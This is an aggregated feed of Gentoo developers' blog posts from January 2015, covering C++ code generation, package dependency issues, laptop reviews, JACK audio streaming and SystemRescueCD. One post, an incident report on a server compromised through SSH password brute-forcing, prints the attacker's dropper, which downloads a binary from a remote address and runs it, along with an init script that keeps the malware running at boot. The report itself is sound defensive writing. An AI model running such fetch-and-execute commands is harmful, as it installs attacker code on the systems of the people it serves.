Other interesting opensource project I’ve been playing with is TNTNET, TNTDB and CXXTools. It’s actually three different libraries, but they are under one umbrella. They also have a really nice API, this time C++ compared to C one in ZeroMQ.

TNTNET is a way how to write web applications in C++. And as most of the we b applications need database, TNTDB is database abstraction layer that let’s you write applications that can easily be deployed against SQLite or MySQL or even PostgreSQL without any modifications to the code. And CXXTools is just a collection of handy utilities that doesn’t fit in neither, but can be used and are used by both.

ZXDB

Now let’s introduce my new project – ZXDB. It combines both. As I was writing some web application (in C++), I found it quite boring dealing with database and doing all those selects, keeping data somewhere, doing updates and stuff. As it is boring and copy&paste and boring, I thought about the abstracting it a little bit and I wrote initial gsl (templating system zproto uses) template, that will generate all the boring code for me.

Now I’m able to easily add or remove properties, I don’t have to deal with database directly as I have a nice class based abstraction on top if and this generated abstraction is using TNTDB to be database independent. I was quite excited when I started playing with this. So much that now I’m even generating unit tests for those generated classes :-)

It is far from perfect and it is missing plenty of features, but it already does something, so it is time to ship it (it compiles at least for me :-) ). I put it on GitHub alongside with some instruction. If you are interested, go take a look. And if you will get interested even more, patches are welcome ;-)

January 28, 2015
Patrick Lauer a.k.a. bonsaikitten (homepage, bugs)
CGit (January 28, 2015, 05:26 UTC)

Dirty hack of the day:

A CGit Mirror of git.overlays.gentoo.org

I wonder if the update cronjob actually works ...

January 23, 2015
Patrick Lauer a.k.a. bonsaikitten (homepage, bugs)
A story of Dependencies (January 23, 2015, 03:41 UTC)

Yesterday I wanted to update a build chroot I have. And ... strangely ... there was a pile of new dependencies:

# emerge -upNDv world

These are the packages that would be merged, in order:

Calculating dependencies... done!
[ebuild     U  ] sys-devel/patch-2.7.2 [2.7.1-r3] USE="-static {-test} -xattr" 0 KiB
[ebuild     U  ] sys-devel/automake-wrapper-10 [9] 0 KiB
[ebuild  N     ] dev-libs/lzo-2.08-r1:2  USE="-examples -static-libs" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] media-fonts/dejavu-2.34  USE="-X -fontforge" 0 KiB
[ebuild  N     ] dev-libs/gobject-introspection-common-1.42.0  0 KiB
[ebuild  N     ] media-libs/libpng-1.6.16:0/16  USE="-apng (-neon) -static-libs" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] dev-libs/vala-common-0.26.1  0 KiB
[ebuild     U  ] dev-libs/libltdl-2.4.5 [2.4.4] USE="-static-libs" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] virtual/ttf-fonts-1  0 KiB
[ebuild  N     ] x11-themes/hicolor-icon-theme-0.14  0 KiB
[ebuild  N     ] dev-perl/XML-NamespaceSupport-1.110.0-r1  0 KiB
[ebuild  N     ] dev-perl/XML-SAX-Base-1.80.0-r1  0 KiB
[ebuild  N     ] virtual/perl-Storable-2.490.0  0 KiB
[ebuild     U  ] sys-libs/readline-6.3_p8-r2 [6.3_p8-r1] USE="-static-libs" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild     U  ] app-shells/bash-4.3_p33-r1 [4.3_p33] USE="net nls (readline) -afs -bashlogger -examples -mem-scramble -plugins -vanilla" 0 KiB
[ebuild  N     ] media-libs/freetype-2.5.5:2  USE="adobe-cff bzip2 -X -auto-hinter -bindist -debug -doc -fontforge -harfbuzz -infinality -png -static-libs -utils" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] dev-perl/XML-SAX-0.990.0-r1  0 KiB
[ebuild  N     ] dev-libs/libcroco-0.6.8-r1:0.6  USE="{-test}" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] dev-perl/XML-LibXML-2.1.400-r1  USE="{-test}" 0 KiB
[ebuild  N     ] dev-perl/XML-Simple-2.200.0-r1  0 KiB
[ebuild  N     ] x11-misc/icon-naming-utils-0.8.90  0 KiB
[ebuild  NS    ] sys-devel/automake-1.15:1.15 [1.13.4:1.13, 1.14.1:1.14] 0 KiB
[ebuild     U  ] sys-devel/libtool-2.4.5:2 [2.4.4:2] USE="-vanilla" 0 KiB
[ebuild  N     ] x11-proto/xproto-7.0.26  USE="-doc" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-proto/xextproto-7.3.0  USE="-doc" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-proto/inputproto-2.3.1  ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-proto/damageproto-1.2.1-r1  ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-libs/xtrans-1.3.5  USE="-doc" 0 KiB
[ebuild  N     ] x11-proto/renderproto-0.11.1-r1  ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] media-fonts/font-util-1.3.0  0 KiB
[ebuild  N     ] x11-misc/util-macros-1.19.0  0 KiB
[ebuild  N     ] x11-proto/compositeproto-0.4.2-r1  ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-proto/recordproto-1.14.2-r1  USE="-doc" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-libs/libICE-1.0.9  USE="ipv6 -doc -static-libs" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-libs/libSM-1.2.2-r1  USE="ipv6 uuid -doc -static-libs" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-proto/fixesproto-5.0-r1  ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-proto/randrproto-1.4.0-r1  ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-proto/kbproto-1.0.6-r1  ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-proto/xf86bigfontproto-1.2.0-r1  ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-libs/libXau-1.0.8  USE="-static-libs" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-libs/libXdmcp-1.1.1-r1  USE="-doc -static-libs" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] dev-libs/libpthread-stubs-0.3-r1  USE="-static-libs" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-libs/pixman-0.32.6  USE="sse2 (-altivec) (-iwmmxt) (-loongson2f) -mmxext (-neon) -ssse3 -static-libs" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  NS    ] app-text/docbook-xml-dtd-4.4-r2:4.4 [4.1.2-r6:4.1.2, 4.2-r2:4.2, 4.5-r1:4.5] 0 KiB
[ebuild  N     ] app-text/xmlto-0.0.26  USE="-latex" 0 KiB
[ebuild  N     ] sys-apps/dbus-1.8.12  USE="-X -debug -doc (-selinux) -static-libs -systemd {-test}" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] net-misc/curl-7.40.0  USE="ipv6 ssl -adns -idn -kerberos -ldap -metalink -rtmp -samba -ssh -static-libs {-test} -threads" ABI_X86="(64) -32 (-x32)" CURL_SSL="openssl -axtls -gnutls -nss -polarssl (-winssl)" 0 KiB
[ebuild  N     ] app-arch/libarchive-3.1.2-r1:0/13  USE="acl bzip2 e2fsprogs iconv lzma zlib -expat -lzo -nettle -static-libs -xattr" 0 KiB
[ebuild  N     ] dev-util/cmake-3.1.0  USE="ncurses -doc -emacs -qt4 (-qt5) {-test}" 0 KiB
[ebuild  N     ] media-gfx/graphite2-1.2.4-r1  USE="-perl {-test}" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] media-libs/fontconfig-2.11.1-r2:1.0  USE="-doc -static-libs" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] app-admin/eselect-fontconfig-1.1  0 KiB
[ebuild  N     ] dev-libs/gobject-introspection-1.42.0  USE="-cairo -doctool {-test}" PYTHON_TARGETS="python2_7" 0 KiB
[ebuild  N     ] dev-libs/atk-2.14.0  USE="introspection nls {-test}" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] dev-util/gdbus-codegen-2.42.1  PYTHON_TARGETS="python2_7 python3_3 -python3_4" 0 KiB
[ebuild  N     ] x11-proto/xcb-proto-1.11  ABI_X86="(64) -32 (-x32)" PYTHON_TARGETS="python2_7 python3_3 -python3_4" 0 KiB
[ebuild  N     ] x11-libs/libxcb-1.11-r1:0/1.11  USE="-doc (-selinux) -static-libs -xkb" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-libs/libX11-1.6.2  USE="ipv6 -doc -static-libs {-test}" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-libs/libXext-1.3.3  USE="-doc -static-libs" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-libs/libXfixes-5.0.1  USE="-static-libs" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-libs/libXrender-0.9.8  USE="-static-libs" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-libs/cairo-1.12.18  USE="X glib svg (-aqua) -debug (-directfb) (-drm) (-gallium) (-gles2) -opengl -openvg (-qt4) -static-libs -valgrind -xcb -xlib-xcb" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-libs/libXi-1.7.4  USE="-doc -static-libs" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-libs/gdk-pixbuf-2.30.8:2  USE="X introspection -debug -jpeg -jpeg2k {-test} -tiff" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-libs/libXcursor-1.1.14  USE="-static-libs" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-libs/libXdamage-1.1.4-r1  USE="-static-libs" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-libs/libXrandr-1.4.2  USE="-static-libs" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-libs/libXcomposite-0.4.4-r1  USE="-doc -static-libs" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-libs/libXtst-1.2.2  USE="-doc -static-libs" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] app-accessibility/at-spi2-core-2.14.1:2  USE="X introspection" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] app-accessibility/at-spi2-atk-2.14.1:2  USE="{-test}" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] media-libs/harfbuzz-0.9.37:0/0.9.18  USE="cairo glib graphite introspection truetype -icu -static-libs {-test}" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-libs/pango-1.36.8  USE="introspection -X -debug" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-libs/gtk+-2.24.25-r1:2  USE="introspection (-aqua) -cups -debug -examples {-test} -vim-syntax -xinerama" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] gnome-base/librsvg-2.40.6:2  USE="introspection -tools -vala" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-themes/adwaita-icon-theme-3.14.1  USE="-branding" 0 KiB
[ebuild  N     ] x11-libs/gtk+-3.14.6:3  USE="X introspection (-aqua) -cloudprint -colord -cups -debug -examples {-test} -vim-syntax -wayland -xinerama" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] gnome-base/dconf-0.22.0  USE="X {-test}" 0 KiB

Total: 78 packages (6 upgrades, 70 new, 2 in new slots), Size of downloads: 0 KiB

The following USE changes are necessary to proceed:
 (see "package.use" in the portage(5) man page for more details)
# required by x11-libs/gtk+-2.24.25-r1
# required by x11-libs/gtk+-3.14.6
# required by gnome-base/dconf-0.22.0[X]
# required by dev-libs/glib-2.42.1
# required by media-libs/harfbuzz-0.9.37[glib]
# required by x11-libs/pango-1.36.8
# required by gnome-base/librsvg-2.40.6
# required by x11-themes/adwaita-icon-theme-3.14.1
=x11-libs/cairo-1.12.18 X
BOOM. That's heavy. There's gtk2, gtk3, most of X ... and things want to enable USE="X" ... what's going on ?!

After some experimenting with selective masking and tracing dependencies I figured out that it's dev-libs/glib that pulls in "everything". Eh?
ChangeLog says:
  21 Jan 2015; Pacho Ramos  -files/glib-2.12.12-fbsd.patch,
  -files/glib-2.36.4-znodelete.patch,
  -files/glib-2.37.x-external-gdbus-codegen.patch,
  -files/glib-2.38.2-configure.patch, -files/glib-2.38.2-sigaction.patch,
  -glib-2.38.2-r1.ebuild, -glib-2.40.0-r1.ebuild, glib-2.42.1.ebuild:
  Ensure dconf is present (#498436, #498474#c6), drop old
So now glib depends on dconf (which is actually not correct, but fixes some bugs for gtk desktop apps). dconf has USE="+X" in the ebuild, so it overrides profile settings, and pulls in the rest.
USE="-X" still pulls in dbus unconditionally, and ... dconf is needed by glib, and glib is needed by pkgconfig, so that would be mildly upsetting as every user would now have dconf and dbus installed. (Unless, of course, we switched pkgconfig to USE="internal-glib")

After a good long discussion on IRC with some good comments on the bugreport we figured out a solution that should work for all:
dconf ebuild is fixed to not set default useflags. So only desktop profiles or USE="X" set by users will pull in X-related dependencies. glib gets a dbus useflag, which is default-enabled on desktop profiles, so there the dependency chain works as desired. And for the no-desktop no-X usecase we have no extra dependencies, and no reason to be grumpy.

This situation shows quite well how unintended side-effects may happen. The situation looked good for everyone on a desktop profile (and dconf is small enough to be tolerated as dependency). But on not-desktop profiles, suddenly, we're looking at a pile of 'wrong' dependencies, accidentally forced on everyone. Oops :)

In the end, all is well, and I'm still confused why writing a config file needs dbus and xml and stuff. But I guess that's called progress ...

January 21, 2015
Sven Vermeulen a.k.a. swift (homepage, bugs)
Old Gentoo system? Not a problem… (January 21, 2015, 21:05 UTC)

If you have a very old Gentoo system that you want to upgrade, you might have some issues with too old software and Portage which can’t just upgrade to a recent state. Although many methods exist to work around it, one that I have found to be very useful is to have access to old Portage snapshots. It often allows the administrator to upgrade the system in stages (say in 6-months blocks), perhaps not the entire world but at least the system set.

Finding old snapshots might be difficult though, so at one point I decided to create a list of old snapshots, two months apart, together with the GPG signature (so people can verify that the snapshot was not tampered with by me in an attempt to create a Gentoo botnet). I haven’t needed it in a while anymore, but I still try to update the list every two months, which I just did with the snapshot of January 20th this year.

I hope it at least helps a few other admins out there.

Patrick Lauer a.k.a. bonsaikitten (homepage, bugs)
Demo Operating Systems on new hardware (January 21, 2015, 10:16 UTC)

Recently I got to interact with two Lenovo notebooks - an E445 with Ubuntu Demo preinstalled, and an E431 with Win8 Demo preinstalled.
Why do I say demo? Because these were completely unusable. Let me explain ...

The E445 is a very simple notebook - 14" crap display, slowest AMD APU they could find, 4GB RAM (3 usable due to graphics card stealing the rest). Slowest harddisk ever ;)
The E431 is pretty much the same form factor, but the slowest Intel CPU (random i3) and also 4GB RAM and a crap display.

On powerup the E445 spent about half an hour "initialising" and kinda installing whatever. Weird because you could do that before and deliver an instant-on disk image, but this whole thing hasn't been thought out.
The Ubuntu version it comes with (12.04 LTS I think?) is so old that the graphics drivers can't drive the display at native resolution out of the box. So your display will be a fuzzy 1024x768 upscaled to 1366x768. I consider this a demo because there's some obvious bugs - the black background glows purple, there's random output from init scripts bleeding over the bootsplash. And then once you login there's this ... hmm. Looks like a blend of MovieOS and a touchscreen UI and goes by the name of Unity. The whole mix is pretty much unusable, mostly because basic things like screen resolution are broken in ways that are not easy to fix.

The other device came with a Win8 demo. Out of the box it takes about 5 minutes to start, and then every app takes 30-60 seconds to start. It's brutally slow.
After boot about 2.5GB RAM are in use, so pretty much any action can trigger swapping. It's brutally slow. Oh wait, I already said that.
At some point it decided to update to 8.1, which took half an hour to download and about seven hours to install. WHAT TEH EFF!

The UI is ... MovieOS got drunk. A part is kinda touchscreen thingy, and the rest is even more confused. Localization is horribad (some parts are pictogram only, some part are text only - and since this is a chinese edition I wouldn't even know hot to reboot it! squiggly hat box squiggly bug ... or is it square squiggly star ? Oh my, this is just bad.
And I said demo, because shutdown doesn't. Looks like the hibernate and shutdown bugs are crosswired the wrong way?
There's random slowdowns doing basic tasks, even youtube video randomly stutters and glitches because the OS is still not ready for general use. And it's slow ... oh wait, I said that. So all in all, it's a nice showroom demo, but not useful.

Installing Gentoo was all in all pretty boring, with full KDE running the memory usage is near 500MB (compared to >2GB for the win demo). Video runs smoothly, audio works. Ethernet connection with r8169 works, WLAN with BCM43142 requires broadcom-sta aka. wl. Very very bad driver stupid, it'd be easier to not have this device built in.
Both the intel card in the E431 and the radeon in the E445 work well, although the HD 8550G needs the newest release of xf86-video-ati to work.

The E445 boots cleanly in BIOS mode, the E431 quietly fails (sigh) because SecureBoot (sigh!) unless you actively disable it. Also randomly the E431 tries to reset to factory defaults, or fails to boot with Fan Warning. Very shoddy, but usually smacking it with a hammer helps.

I'm a little bit sad that all new notebooks are so conservative with maximum amount of RAM, but on the upside the minimum is defined by Win8 Demo requirements. So most devices have 4GB RAM, which reminds me of 2008. Hmm.
Harddisks are getting slower and bigger - this seems to be mostly penny pinching. The harddisk in the R400 I had years ago was faster than the new ones!

And vendors should maybe either sell naked notebooks without an OS, or install something that is properly installed and preconfigured. And, maybe, a proper recovery DVD so that the OS can be reinstalled? Especially as both these notebooks come with a DVD drive. I have no opinion if it works because I lack media to test with, but it wastes space ...

(If you are a vendor, and want to have things tested or improved, feel free to send me free hardware and maybe consider compensating me for my time - it's not that hard to provide a good user experience, and it'll improve customer retention a lot!)

Getting compromised (January 21, 2015, 09:16 UTC)

Recently I was asked to set up a new machine. It had been minimally installed, network started, and then ignored for a day or two.

As I logged in I noticed a weird file in /root: n8005.tar
And 'file' said it's a shellscript. Hmmm ....

#!/bin/sh
PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
wget http://432.567.99.1/install/8005
chmod +x 8005
./8005


At this point my confidence in the machine had been ... compromised. "init 0" it is!
A reboot from a livecd later I was trying to figure out what the attacker was trying to do:
* An init script in /etc/init.d
#!/bin/sh
# chkconfig: 12345 90 90
# description: epnlmqmjph
### BEGIN INIT INFO
# Provides:             epnlmqmjph
# Required-Start:
# Required-Stop:
# Default-Start:        1 2 3 4 5
# Default-Stop:
# Short-Description:    epnlmqmjph
### END INIT INFO
case $1 in
start)
        /usr/bin/epnlmqmjph
        ;;
stop)
        ;;
*)
        /usr/bin/epnlmqmjph
        ;;
esac
* A file in /usr/bin
# file epnlmqmjph
epnlmqmjph: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped

# md5sum epnlmqmjph
2cb5174e26c6782db94ea336696cfb7f  epnlmqmjph
* a file in /sbin I think - I didn't write down everything, just archived it for later analysis
# file bin_z 
bin_z: ERROR: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linkederror reading (Invalid argument)
# md5sum bin_z 
85c1c4a5ec7ce3efef5c5b20c5ded09c  bin_z
The only action I could do at this stage was wipe and reinstall, and so I did.
So this was quite educational, and a few minutes after reboot I saw a connection with putty as user agent in the ssh logs.
Sorry kid, not today ;)

There's a strong lesson in this: Do not use ssh passwords. Especially for root. A weak password can be accidentally bruteforced in a day or two!

sshd has an awesome feature: "PermitRootLogin without-password" if you rely on root login, at least avoid sucessful password logins!

And I wonder how much accidental security running not-32bit not-CentOS gives ;)

January 19, 2015
Cinnamon 2.4 (January 19, 2015, 11:55 UTC)

A few weeks ago, I upgrade all cinnamon ebuilds to 2.4 in tree. However I could not get Cinnamon (shell part) to actually work, as in show anything useful on my display. So this is a public service announcement that if you like Cinnamon and want to help with this issue, please visit bug #536374. For some reason, the hacks found in gnome-shell does not seem to work with cinnamon’s shell.

January 16, 2015
Michał Górny a.k.a. mgorny (homepage, bugs)
Surround sound over network with Windows 8 (January 16, 2015, 15:26 UTC)

I’ve got a notebook with some fancy HD Audio sound card (stereo!), and a single output jack — not a sane way to get surround sound (sure, cool kids use HDMI these days). Even worse, connecting an external amplifier to the jack results in catching a lot of electrical interference. Since I also have a PC which has surround speakers connected, I figured it would be a good idea to stream the audio over the network.

On non-Windows, the streaming would be trivial to setup. Likely PulseAudio on both machines, few setup bits and done. If you are looking for a guide on how to do such a thing in Windows, you’re likely end up setting up an icecast server listening to the stereo mix. Bad twice. Firstly, stereo-only. Secondly, poor latency. Now imagine playing a game or watching a movie with sound noticeably delayed after picture (well, in the movie player you could at least play with A/V delay to work-around that). But there must be another way…

The ingredients

In order to get a working surround sound system, you need to have:

  1. two JACK2 servers — one on each computer,
  2. ASIO4ALL,
  3. and an ASIO-friendly virtual sound device such as VB-Audio Hi-Fi Cable.

Install the JACK server on the computer with speakers, and all the tools on the other machine.

Setting up the JACK slave (on speaker-PC)

I’m going to start with setting up the speaker-PC since it’s simpler. It can run basically any operating system, though I’m using Gentoo Linux for this guide. JACK is set up pretty much the same everywhere, with the only difference in used audio driver.

The choice of master vs. slave is pretty much arbitrary. The slave needs to either combine a regular audio driver with netadapter, or the net driver with audioadapter. I’ve used the former.

First, install JACK2. In Gentoo, it can be found in the pro-audio project overlay. A good idea is to disable D-Bus support (USE=-dbus) since I wasn’t able to get JACK running with it and the ebuild doesn’t build regular jackd when D-Bus support is enabled.

Afterwards, start JACK with the desired sound driver and a surround-capable device. You will want to specify a sample rate and bit depth too. Best fit it with the application you’re planning to use. For example:

$ jackd -R -d alsa -P surround40 -r 48000 -S

This starts the JACK daemon with real-time priority support (important for low latency), using ALSA playback device surround40 (4-speaker surround), 48 kHz sample rate and 16-bit samples.

Afterwards, load netadapter with matching number of capture channels, and connect them to the output channels:

$ jack_load netadapter -i '-C 4'
$ jack_connect netadapter:capture_1 system:playback_1
$ jack_connect netadapter:capture_2 system:playback_2
$ jack_connect netadapter:capture_3 system:playback_3
$ jack_connect netadapter:capture_4 system:playback_4

At this point, slave is ready. JACK will wait for a master to start, and will forward any audio received from the master to the local sound card surround output. Since JACK2 supports zero-configuration networking, you don’t need to specify any IP addresses.

Setting up the virtual device

After getting the slave up, it’s time to set the sound source. After installing all the components, the first goal is to set up the virtual audio device. Once the Hi-Fi Cable package is insalled (no need to reboot), the system should start seeing two new devices — playback device called ‘Hi-Fi Cable Input’ and recording device called ‘Hi-Fi Cable Output’. Now open the sound control panel applet and:

  1. select ‘Hi-Fi Cable Input’ as the default output device.
  2. Right-click it and configure speakers. Select whatever configuration is appropriate for your real speaker set (e.g. quad speakers).
  3. (Optionally) right-click it and open properties. On the advanced tab select sample rate and bit depth. Afterwards, open properties of the ‘Hi-Fi Cable Output’ recording device and set the same parameters.

Control Panel sound settings with virtual Hi-Fi Cable Input deviceAdvanced Hi-Fi Cable Input device properties (sample rate and bit depth setting)

As you may notice, even after setting the input to multiple speakers, the output will still be stereo. That’s a bug (limitation?) we’re going to work-around soon…

Setting up the JACK master

Now that device is ready, we need to start setting up JACK. On Windows, the ‘Jack Control’ GUI is probably the easiest way. Start with ‘Setup’. Ensure that the ‘portaudio’ driver is selected, and choose ‘ASIO::ASIO4ALL v2’ both as input and output device. The right-arrow button right of the text inputs should provide a list of devices to select. Additionally select the sample rate matching the one set for the virtual device and the JACk slave.

JACK setup window

Now, we need to load the netmanager module. Similarly to the slave setup, this is done using jack_load. To get this fully automated, you can use the ‘Execute script after startup’ option from the ‘Options’ (right-arrow button is not helpful this time). Create a new .bat file somewhere, and put the following command inside:

jack_load netmanager

Save the file and select is as post-startup script. Now the module will be automatically loaded every time you start JACK via Jack Control. You may also fine-tune some of the ‘Misc’ settings to fit your preferences. Then confirm ‘Ok’ and click ‘Start’. If everything went well so far, after clicking ‘Connect’ you should see both ‘System’ and the slave’s hostname (assuming it is up and running). Do not connect anything yet, just verify that JACK sees the slave.

Connecting the virtual sound card to JACK

Now that the JACK is ready, it’s time to connect the virtual sound card to the remote host. The traditional way of doing that would be through connecting the local recording device (stereo mix or Virtual Cable Output) to the respective remote pins. However, that would mean just stereo. Instead, we have to cheat a little.

One of the fancy features of VB-Audio’s Virtual Hi-Fi Cable is that it supports using ASIO-compatible sound processors. In other words, the sound from virtual cable input is directed into ASIO output port for processing. Good news is that the stereo stripping occurs directly in virtual cable output, so ASIO still gets all the channels. All we have to do is to capture sound there…

Find VB-Cable’s ‘ASIO Bridge’ and start it. If the button in the middle states ‘ASIO OFF’, switch it to enable ASIO. Then click on the ‘Select A.S.I.O. Device’ text below it and select ‘JackRouter’. If everything went well, ‘VBCABLE_AsioBridge’ should appear in the JACK connection panel.

ASIO Bridge window

The final touches

Now that everything’s in place, it’s just a matter of connecting the right pins. To avoid having to connect them manually every time, use the ‘Patchbay’ panel. First, use ‘Add’ on left-hand side to add an output socket, select ‘VBCABLE_AsioBridge’ client and keep clicking ‘Add plug’ for all the input channels. Then, ‘Add’ on right-hand side, your remote host as client and add all the output channels. Now select both new sockets and ‘Connect’.

JACK patchbay setup

Save your new patchbay definition somewhere, and ‘Activate’ it. If you did well, the connections window should now show connections between respective local and remote pins and you should be able to hear sound from the remote speakers.

JACK connections window after setup

Now you can open ‘Setup’ again, and on the ‘Options’ tab activate patchbay persistence. Select your newly created patchbay definition file and from now on, starting JACK should enable the patchbay, and the patchbay should ensure that the pins are connected every time they reappear.

Maintenance notes

First of all, you usually don’t need to set an explicit connection between your virtual device and real system audio device. On my system that connection is established automatically, so that the sounds reach both remote host and local speakers. If that’s unrequested, just mute the sound card…

Secondly, note that now the virtual sound card is the default device, so applications will control its volume (both for remote and local speakers). If you want to mute the local speakers, you need to open the mixer and select your local sound card from device drop-down.

Thirdly, VBCABLE_AsioBridge likes to disappear occasionally when restarting JACK. If you don’t see it in the connections, just turn it off and on again (the ‘ASIO ON’ button) and it should reappear.

Fourthly, if you hear skipping, you can try playing with ‘Frames/Period’ in JACK’s setup. Or reduce the sample rate.

January 14, 2015
Andreas K. Hüttel a.k.a. dilfridge (homepage, bugs)
Cool Gentoo-derived projects (I): SystemRescueCD (January 14, 2015, 22:53 UTC)

Gentoo Linux is the foundation for quite some very cool and useful projects. So, I'm starting (hopefully) a series of blog posts here... and the first candidate is a personal favourite of mine, the famous SystemRescueCD.

http://www.sysresccd.org/
Ever needed a powerful Linux boot CD with all possible tools available to fix your system? You switched hardware and now your kernel hangs on boot? You want to shrink your Microsoft Windows installation to the absolute minimum to have more space for your penguin picture collection? Your Microsoft Windows stopped booting but you still need to get your half-finished PhD thesis off the hard drive? Or maybe you just want to install the latest and greatest Gentoo Linux on your new machine?

For all these cases, SystemRescueCD is the Swiss army knife of your choice. With lots of hardware support, filesystem support, software, and boot options ranging from CD and DVD to installation on USB stick and booting from a floppy disc (!), just about everything is covered. In addition, SystemRescueCD comes with a lot of documentation in several languages.

The page on how to create customized versions of SystemRescueCD gives a few glimpses on how Gentoo is used here. (I'm also playing with a running version in a virtual machine while I type this. :) Basically the internal filesystem is a normal Gentoo x86 (i.e. 32bit userland) installation, with distfiles, portage tree, and some development files (headers etc.) removed to decrease disk space usage. (Skimming over the files in /etc/portage, the only really unusual thing which I can see is that >=gcc-4.5 is masked; the installed GCC version is 4.4.7- but who cares in this particular case.) After uncompressing the filesystem and re-adding the Gentoo portage tree, it can be used as a chroot, and (with some re-emerging of dependencies because of the deleted header files) packages can be added, deleted, or modified.

Downsides? Well, not much. Even if you select a 64bit Kernel on boot, the userland will always be 32bit. Which is fine for maximum flexibility and running on ancient hardware, but of course imposes the usual limits. And rsync then runs out of memory after copying a few TByte of data (hi Patrick)... :D

Want to try? Just emerge app-admin/systemrescuecd-x86 and you'll comfortably find the ISO image installed on your harddrive in /usr/share/systemrescuecd/.



From the /root/AUTHORS file in the rescue system:
SystemRescueCd (x86 edition)
Homepage: http://www.sysresccd.org/
Forums: http://www.sysresccd.org/forums/

* Main Author:  Francois Dupoux
* Other contributors:
  - Jean-Francois Tissoires (Oscar and many help for testing beta versions)
  - Franck Ladurelle (many suggestions, and help for scripts)
  - Pierre Dorgueil (reported many bugs and improvements)
  - Matmas did the port of linuxrc for loadlin
  - Gregory Nowak (tested the speakup)
  - Fred alias Sleeper (Eagle driver)
  - Thanks to Melkor for the help to port to unicode

Nathan Zachary a.k.a. nathanzachary (homepage, bugs)
Fortune cookie wisdom part VI (January 14, 2015, 19:11 UTC)

It’s been a long time since I’ve posted a new set of “Fortune cookie wisdom,” but I think that I have five good ones here. Before reading them, if you’d like to check out the previous posts in the series, you can with the links below:

Now that you’ve wasted a good amount of time reading those previous posts (hey, it’s better than watching more cat videos on YouTube, right?), here are the new ones:

  • Generosity and perfection are your everlasting goals.
  • We must always have old memories and young hopes.
  • Discontent is the first step in the progress of a man or a nation.
  • An important word of advice may come from a child.
  • Someone is looking up to you. Don’t let that person down.

I think that the third one is especially true in these times. With many political, social, economic, and societal decisions being made without full support of the people, it is necessary for individuals to express discontent before any change can begin. The fourth one is incredibly important to remember. We all too often forget that children can show us different ways of looking at otherwise maladroit or stale situations. They can enlighten us and open our eyes to perspectives that we may not have considered with our “adult” worldviews. I’m reminded of the recent Why advertisement from Charles Schwab:

It also ties nicely to the final one that I posted today. We need to remember to always act with integrity because there is always someone looking up to us, and modelling his or her behaviours after our own.

Good stuff, but like the previous post, I think that there was less of an emphasis on the funnier side of the fortune cookies. Hopefully I’ll get some new funny ones soon.

Cheers,
Zach

Donnie Berkholz a.k.a. dberkholz (homepage, bugs)
Gentoo needs focus to stay relevant (January 14, 2015, 03:36 UTC)

After nearly 12 years working on Gentoo and hearing blathering about how “Gentoo is about choice” and “Gentoo is a metadistribution,” I’ve come to a conclusion to where we need to go if we want to remain viable as a Linux distribution.

If we want to have any relevance, we need to have focus. Everything for everybody is a guarantee that you’ll be nothing for nobody. So I’ve come up with three specific use cases for Gentoo that I’d like to see us focus on:

People developing software

